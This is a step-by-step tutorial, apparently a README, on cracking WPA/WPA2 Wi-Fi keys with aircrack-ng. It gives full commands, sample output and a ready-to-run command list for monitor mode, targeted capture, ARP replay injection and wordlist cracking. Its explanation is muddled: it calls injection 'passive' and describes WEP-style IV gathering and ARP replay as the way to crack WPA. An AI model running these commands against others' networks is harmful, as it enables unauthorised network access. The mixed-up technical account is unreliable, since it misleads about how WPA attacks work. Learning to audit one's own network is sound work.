Wi-Fi cracking with aircrack-ng

Aircrack-ng is basically a network software suite that has been crafted to achieve the following objectives:

• packet sniffing
• attacking (replay attacks, deauthentication, fake access points...) via packet injection
• testing Wi-Fi cards and driver capabilities (capture and injection)
• cracking WEP and WPA/WPA2 Wi-Fi routers

Note that the present tutorial is not an exhaustive guide, rather it is intended to build some basic skills to test your own network's security and get familiar with the concepts.

The attack outlined below is based on a passive technique (ARP request replay attack) and it focuses on debian-based distributions assuming you have a working wireless card with drivers already patched for injection.

Aircrack-ng installation

Aircrack-ng can be installed on a debian-based operating system by compiling the source code (for more details you can visit the official website).

Installing required and optional dependencies

Below you can find instructions for installing the basic requirements to build aircrack-ng for Debian-based operating systems.

$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils

Get the latest copy of aircrack-ng:

$ git clone https://github.com/aircrack-ng/aircrack-ng
$ cd aircrack-ng

Compiling and installing

To build aircrack-ng, the Autotools build system is used. First, ./configure the project for building with the appropriate options:

$ autoreconf -i
$ ./configure --with-experimental

Next, compile the project with the make command and use the "installing" target from the additional targets listed below to complete the installation.

• Execute all unit testing: make check
• Execute all integration testing (requires root): make integration
• Installing: make install
• Uninstall: make uninstall

Test wireless device packet injection

The purpose of this step ensures that your card successfully supports injection. Assuming your interface name is "wlan0" (you can retrieve it typing iwconfig on the terminal), type the following command:

# aireplay-ng --test wlan0

The system responds:

18:10:59  wlan0 channel: 10
18:10:59  Trying broadcast probe requests...
18:10:59  Injection is working!
18:11:00  Found 1 AP
...

This confirms your card can inject packets.

Simple sniffing and cracking

1. Start the wireless interface in monitor mode

The first thing to do is looking out for a potential target putting your wireless card into monitor mode using airmon-ng. However, it is strongly recommended to kill all interfering processes prior to using the aircrack-ng suite.

# airmon-ng check kill
Killing these processes:

  PID Name
  870 dhclient
 1115 wpa_supplicant

Then, it is possible to enable the monitor mode used to create another interface (mon0):

# airmon-ng start wlan0

PHY         Interface       Driver         Chipset

phy0        wlan0           ath9k          Qualcomm Atheros AR9485
                               (monitor mode enabled for [phy0]wlan0 on [phy0]mon0)

You will notice that "wlan0" has successfully been put into monitor mode. Then, start airodump-ng to look out for networks:

# airodump-ng mon0

Locate the wireless network you want to crack, and note its BSSID and channel from the following output:

CH 10 ][ Elapsed: 36 s][2019-05-15 18:15
BSSID              PWR  RXQ  Beacons  #Data,  #/s  CH  MB  ENC  CIPHER AUTH ESSID
08:00:BF:E6:31:2E  -21  100     5240  178307  338  10  54  WPA  CCMP   PSK  infosec_router
...

Note that the top part of the output lists information about APs in range, and the bottom part lists clients connected to the corresponding APs.

2. Start airodump-ng to capture the initial vectors

Open another console session to capture the initial vectors generated by the target and to save the result into a file:

# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0

where -c 10 is the channel for the wireless network, --bssid 08:00:BF:E6:31:2E is the MAC address of the AP, -w output-file defines the output files that will contain the initialization vectors, and mon0 is the interface name.

The system responds:

CH 10 ][ Elapsed: 12 s][2019-05-15 18:16
BSSID              PWR  RXQ  Beacons  #Data,  #/s  CH  MB  ENC  CIPHER AUTH ESSID
08:00:BF:E6:31:2E  -21  100     5240  178307  338  10  54  WPA  CCMP   PSK  infosec_router

BSSID              STATION            PWR  Lost  Packets  Probes
08:00:BF:E6:31:2E  00:0F:35:51:AC:22  -21     0   183782

After the execution of the command various files will be generated.

3. Start aireplay-ng in ARP request replay mode

The classic ARP request replay attack is the most effective way to generate new initialization vectors, and works very reliably. The purpose of this step is to start aireplay-ng in a mode which listens for ARP requests then reinjects them back to the access point. Keep your airodump-ng and aireplay-ng running, open another terminal and run the ARP request replay attack:

# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 618643 packets (got 304896 ARP requests), sent 194947 packets...

You can check if the packets are injected by looking at the airodump-ng screen.

Run aircrack-ng to obtain the WPA key

At this point, you should be able to obtain the WPA key from the initialization vectors gathered in the previous steps. To perform this attack you need a wordlist and if the network password is not in the wordfile you will not crack the password. Note that most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the WPA-length password lists.

Open another console session and type:

# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap

where -a2 specifies the attack mode for WPA/WPA2-PSK, -w wordlist.txt refers to your own dictionary wordlist, and output*.cap selects all output files with .cap extension.

This is the output of a successful attack:

                        Aircrack-ng 1.5.2
[00:00:00] 192/1229 keys tested (520.04 k/s)

Time left: 0 seconds                                      15.62%

                     KEY FOUND! [ notsecure ]

Master Key     : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA
                 06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63

Transient Key  : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3
                 86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E
                 4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A
                 90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A

EAPOL HMAC     : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68

List of commands

Below you can find the list of all of the commands needed to crack a WPA/WPA2 network.

# kill all interfering processes prior to using the aircrack-ng
airmon-ng check kill

# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake on a new console session
airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0

# start the ARP request replay attack
aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0

# run aircrack-ng to obtain the WPA key
aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap

License

This project is licensed under the MIT License - see the LICENSE file for details.

Disclaimer

This tutorial has been made for educational purposes only, I don't promote malicious practices and I will not be responsible for any illegal activities.